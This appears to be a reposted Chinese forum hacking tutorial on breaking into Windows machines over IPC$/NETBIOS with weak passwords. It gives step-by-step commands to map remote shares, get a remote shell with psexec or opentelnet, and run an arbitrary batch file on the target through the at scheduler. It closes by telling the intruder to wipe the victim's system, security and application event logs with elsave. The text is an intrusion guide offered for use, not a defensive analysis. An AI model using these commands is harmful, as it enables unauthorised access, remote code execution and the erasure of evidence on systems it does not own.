[转载]通过IPC得到NETBIOS信息与弱口令基本使用方法
文章作者:demonalex得此口令是通过本机得SYSTEM进程与对方的机器进行NETBIOS通信,得到对方
的内部信息,所以需要通过对方的TCP139或TCP445端口。得到信息后通过简单的
暴力破解法穷举出弱口令的。
需要工具:Opentelnet.exe 或者 Psexec.exe
利用方法:
打开cmd.exe,打下以下命令:
net use \\远程IP\ipc$ "弱密码" /user:"弱用户"
打开管道后。
1)就可以:
psexec \\远程IP -u 弱用户 -p 弱密码 c:\winnt\system32\cmd.exe
便可以出SHELL了。
2)也可以使用OPENTELNET:
opentelnet \\远程IP 弱用户 弱密码 0 1060
提示成功后打入:
telnet 远程IP 1060
然后输入弱用户及弱密码便可出SHELL了。
3)也可以使用古老的方法,就是AT命令。
把远程机子的其中一个硬盘做个影射:
net use z: \\远程IP\c$
然后把abc.bat放到z:\winnt\system32\下(这个abc.bat的内容是什么,你喜
欢做什么就做什么吧.....)
看看对方的时间:
net time \\远程IP
如时间为:10:44
则你使用:
at \\远程IP 10:45 abc.bat
就可以远程不出SHELL的操作远程主机了。
注意:楼上的方法要注意的是,你得到的弱口令一定要是管理员才行。
如果是USER的话就不一定行了(PS:去看提升权限的书吧,不在此文的内容之
内)。
附:入侵后记得把足迹粉刷干净,介绍一个工具elsave.exe,因为通过IPC入侵
是可以从对方的日志(应用程序日志,安全日志,系统日志)中找到记录的。
此工具可以删除其中的记录,使用方法:
elsave -s \\远程IP -l "system" -C
elsave -s \\远程IP -l "security" -C
elsave -s \\远程IP -l "application" -C
可以了。真的要感谢小榕....................
页:
[1]